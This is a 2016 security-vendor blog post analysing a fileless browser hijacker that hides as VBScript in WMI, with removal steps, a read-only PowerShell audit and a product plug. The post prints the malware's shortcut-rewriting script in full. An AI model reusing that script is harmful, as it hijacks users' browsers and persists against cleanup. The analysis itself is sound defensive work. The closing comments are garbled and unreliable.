Sunday, April 24, 2016

Fileless Browser Hijacker

Recently, we discovered a browser hijacker that alters shortcuts by inserting an argument. When you open your browser, instead of your favorite search engine, you will be presented with this one:

This is nothing new when it comes to browser hijacking, I would say it's a well-known trick, but I was fascinated by how this malware works and the idea they came up with to stay undetected by altering your shortcuts over and over again after cleaning.

This so-called fileless malware lives inside WMI (Windows Management Instrumentation) or, more precisely, as a Visual Basic script inside the ActiveScriptEventConsumer class.

The script is executed by the WMI Standard Event Consumer scripting application, which can be found in the WMI folder at %system32%\wbem\scrcons.exe. This makes the script hard to detect, since it runs under a not-so-common WMI application, scrcons.exe, rather than the traditional JS application wscript.exe.

The built-in Windows application wbemtest.exe or WMIExplorer can be used to access this script.

Below is the content of the VBScript used to hijack browsers:
Dim objFS
Set objFS = CreateObject("Scripting.FileSystemObject")
On Error Resume Next
Const link = ""
browsers = Array("IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe")
Set BrowserDic = CreateObject("scripting.dictionary")
For Each browser In browsers
 BrowserDic.Add LCase(browser), browser
Dim FoldersDic(12)
Set WshShell = CreateObject("Wscript.Shell")
FoldersDic(0) = "C:\Users\Public\Desktop"
FoldersDic(1) = "C:\ProgramData\Microsoft\Windows\Start Menu"
FoldersDic(2) = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs"
FoldersDic(3) = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
FoldersDic(4) = "C:\Users\Rafael\Desktop"
FoldersDic(5) = "C:\Users\Rafael\AppData\Roaming\Microsoft\Windows\Start Menu"
FoldersDic(6) = "C:\Users\Rafael\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"
FoldersDic(7) = "C:\Users\Rafael\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
FoldersDic(8) = "C:\Users\Rafael\AppData\Roaming"
FoldersDic(9) = "C:\Users\Rafael\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch"
FoldersDic(10) = "C:\Users\Rafael\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu"
FoldersDic(11) = "C:\Users\Rafael\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar"
Set fso = CreateObject("Scripting.Filesystemobject")
For i = 0 To UBound(FoldersDic)
 For Each file In fso.GetFolder(FoldersDic(i)).Files
  If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
   set oShellLink = WshShell.CreateShortcut(file.Path)
   path = oShellLink.TargetPath
   name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
   If BrowserDic.Exists(LCase(name)) Then
    oShellLink.Arguments = link
    If file.Attributes And 1 Then
     file.Attributes = file.Attributes - 1
    End If
   End If
  End If
createobject("").run "cmd /c taskkill /f /im scrcons.exe", 0

As you can see, the malware is able to hijack 14 different browsers by checking their executables:


Zemana AntiMalware removes this malware and cleans altered shortcuts.

Manual removal

The manual removal of this malware isn't hard at all.
  • Press the Windows key + R on your keyboard at the same time. Type wbemtest and click OK.

  • The Windows Management Instrumentation Tester window will open. Click Connect.

  • Type root\subscription exactly like on the image below:

  • Click Open Class on the next window and type ActiveScriptEventConsumer.

  • Now you need to click Instances.

  • And then to finally remove this malware:

The only thing left is to remove the argument from your browser shortcuts.
  • Right click on the desired shortcut and select Properties.
  • Remove argument after "
  • Click OK to apply changes.
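
The same two places the manual steps cover, checked from an elevated PowerShell 3.0+ prompt. This read-only audit is an added example, not part of the original post or of Zemana's tooling; the CIM class and property names are standard WMI, while the folder list and variable names are this example's own choices.

```powershell
# Added example: read-only audit, nothing is modified or deleted.
$ns = 'root\subscription'

# 1. Script consumers: the class the post says holds the hijacker's VBScript.
$consumers = @(Get-CimInstance -Namespace $ns -ClassName ActiveScriptEventConsumer -ErrorAction SilentlyContinue)
$consumers | Format-List Name, ScriptingEngine, ScriptFileName, ScriptText

# 2. Bindings and filters show what triggers each consumer.
#    A complete cleanup removes the consumer, its binding and its filter.
$bindings = @(Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding -ErrorAction SilentlyContinue)
$filters  = @(Get-CimInstance -Namespace $ns -ClassName __EventFilter -ErrorAction SilentlyContinue)
$bindings | Where-Object { $consumers.Name -contains $_.Consumer.Name } | ForEach-Object {
    $filterName = $_.Filter.Name
    $filter = $filters | Where-Object { $_.Name -eq $filterName }
    [pscustomobject]@{ Consumer = $_.Consumer.Name; Filter = $filterName; Query = $filter.Query }
} | Format-List

# 3. Shortcuts that point at one of the browsers named in the script and carry an argument.
$browsers = 'IEXPLORE.EXE','chrome.exe','firefox.exe','360chrome.exe','360SE.exe',
            'SogouExplorer.exe','opera.exe','Safari.exe','Maxthon.exe','TTraveler.exe',
            'TheWorld.exe','baidubrowser.exe','liebao.exe','QQBrowser.exe'
$roots = @(
    [Environment]::GetFolderPath('Desktop'),
    [Environment]::GetFolderPath('CommonDesktopDirectory'),
    [Environment]::GetFolderPath('StartMenu'),
    [Environment]::GetFolderPath('CommonStartMenu'),
    (Join-Path $env:APPDATA 'Microsoft\Internet Explorer\Quick Launch')
) | Where-Object { $_ -and (Test-Path $_) }

$shell = New-Object -ComObject WScript.Shell
Get-ChildItem -Path $roots -Filter *.lnk -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
    $lnk = $shell.CreateShortcut($_.FullName)   # opens the existing .lnk; nothing is saved
    if (-not $lnk.TargetPath) { return }        # skip shortcuts without a file target
    $exe = Split-Path $lnk.TargetPath -Leaf
    if (($browsers -contains $exe) -and $lnk.Arguments) {
        [pscustomobject]@{ Shortcut = $_.FullName; Target = $lnk.TargetPath; Arguments = $lnk.Arguments }
    }
} | Format-List
```

Some legitimate shortcuts also carry arguments (for example browser profile switches), so review each reported Arguments value before clearing it.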

Save yourself the hassle and install Zemana AntiMalware.

Additional Information:

Md5: a718bf376567abd3e7de06f31b036405
VirusTotal: Yeabests installer



  1. You just saved my day! Thanks!

  2. Trojan steed contaminations have dependably been a danger that made repulsiveness among web clients and this is for the most part since they were made for the fundamental reason for permitting outsiders and programmers access to any framework and thus may turn out to be more destructive than infection programs.

  3. A particular element of the thieves is that they take the client's program under full control, and don't leave him a shot. The program changes the settings of the program, the default internet searcher and uncovered its own landing page.